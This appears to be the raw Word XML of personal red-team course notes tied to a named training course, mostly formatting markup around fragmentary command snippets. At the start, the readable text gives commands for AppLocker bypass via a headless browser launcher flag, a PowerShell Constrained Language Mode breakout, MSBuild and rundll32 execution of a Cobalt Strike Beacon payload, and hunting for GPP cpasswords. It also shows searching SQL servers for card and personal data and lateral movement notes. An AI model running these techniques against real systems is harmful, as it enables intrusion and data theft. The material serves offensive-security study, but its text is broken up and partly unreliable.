--gpu-launcher="C:\Windows\Tasks\smb3_x64.exe &amp;&amp;"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"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless --disable-gpu-sandbox --gpu-launcher="C:\Windows\Tasks\smb3_x64.exe &amp;&amp;"</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Powershell Contrained Language Mode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1. Break out of PowerShell Constrained Language Mode by using an unmanaged PowerShell runspace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powershell $ExecutionContext.SessionState.LanguageMode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ConstrainedLanguage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$ExecutionContext.SessionState.LanguageMode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FullLanguage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2. We can also achieve the FullLanguage Mode using the LOLBAS, For that we can use the C# loader which can execute a powershell commands. And then add it to a .csproj or .xml file, and execute this using msbuild.exe.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C:\Windows\Microsoft.Net\Framework64\v4.0.30319\MSBuild.exe test.csproj</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Beacon DLL (DLLs are usually not restricted by Applocker due to performance reason)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DLL enforcement is not commonly enabled which allows us to call exported functions from DLLs on disk via rundll32.</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Beacon's DLL payload exposes several exports including DllMain and StartW.  These can be changed in the Artifact Kit under src-main, dllmain.def.</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C:\Windows\System32\rundll32.exe http_x64.dll,StartW</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3EB7">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3E3EB7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Data Exfiltration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Enumerate Share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Invoke-ShareFinder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Invoke-FileFinder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Get-FileNetServer</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shell findstr /S /I cpassword \\dc.organicsecurity.local\sysvol\organicsecurity.local\policies\*.xml</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Get-DecryptedCpassword</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Find accessible share having juicy information</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Find-DomainShare -CheckShareAccess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Find-InterestingDomainShareFile -Include *.doc*, *.xls*, *.csv, *.ppt*</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gc \\fs.dev.cyberbotic.io\finance$\export.csv | select -first 5</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Search for senstive data in directly accessible DB by keywords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Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLColumnSampleDataThreaded -Keywords "email,address,credit,card" -SampleSize 5 | select instance, database, column, sample | ft -autosize</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 Search for senstive data in DB links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lastRenderedPageBreak/>
        <w:t>beacon&gt; powerpick Get-SQLQuery -Instance "sql-2.dev.cyberbotic.io,1433" -Query "select * from openquery(""sql-1.cyberbotic.io"", 'select * from information_schema.tables')"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"sql-2.dev.cyberbotic.io,1433" -Query "select * from openquery(""sql-1.cyberbotic.io"", 'select column_name from master.information_schema.columns where table_name=''employees''')"</w:t>
      </w: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p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3E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F8F8F2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E3EB7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>beacon&gt; powerpick Get-SQLQuery -Instance "sql-2.dev.cyberbotic.io,1433" -Query "select * from openquery(""sql-1.cyberbotic.io"", 'select top 5 first_name,gender,sort_code from master.dbo.employees')"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003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3E3EB7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Not able to migrate to another process using Inject Command (worked by choosing P2P </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003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3E3EB7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>beacon)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003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3E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003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3E3EB7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># Was facing some issues with doing the lateral movement by SYSTEM User</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003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3E3EB7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">- But if we have access to NTLM hash, we can directly use PTH and JUMP to move laterally </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003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3E3EB7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Still Powerview functions don't work in this context, need to find a way</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3EB7">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E3EB7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3EB7">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3E3EB7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Reference:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3EB7">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId39" w:history="1">
        <w:r w:rsidRPr="003E3EB7">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://training.zeropointsecurity.co.uk/courses/red-team-ops</w:t>
        </w:r>
      </w:hyperlink>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2414"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AF5A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3680"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FEC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312E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E9C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0136"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="49C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94250"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6B0C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D49B0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="60504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779C5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A742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F795F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F5A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70C73"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B4D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60952"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7E9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C4DFA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="753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E327C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F07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21834"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8B0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A7697"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="959A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D0D74"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9B3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33556"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AE2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363F2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2F08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D0E64"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="947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7"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="1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7"/>
    <w:rsid w:val="003E3EB7"/>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35287-DFF9-4165-A714-4660A380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EB7"/>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EB7"/>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3EB7"/>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E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3E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3EB7"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003E3EB7"/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003E3EB7"/>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3E3EB7"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003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E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3EB7"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="token">
    <w:name w:val="token"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="003E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620">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1320957535">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1064527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726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142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02142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070042">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1373726644">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1587691892">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="747312863">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="3434764">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="2007441377">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1482775806">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1339427516">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="804355286">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1373068582">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="753743730">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="559563539">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1260915308">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1379670366">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="256720155">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="2093775691">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="742409253">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="243344646">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1670401382">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1356037747">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="842864052">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="369644345">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1216509440">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="278344070">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1429037862">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1418284621">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="52697975">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1013072466">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1785156128">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="998650849">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1552958612">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1805657461">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="23756471">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="998078902">
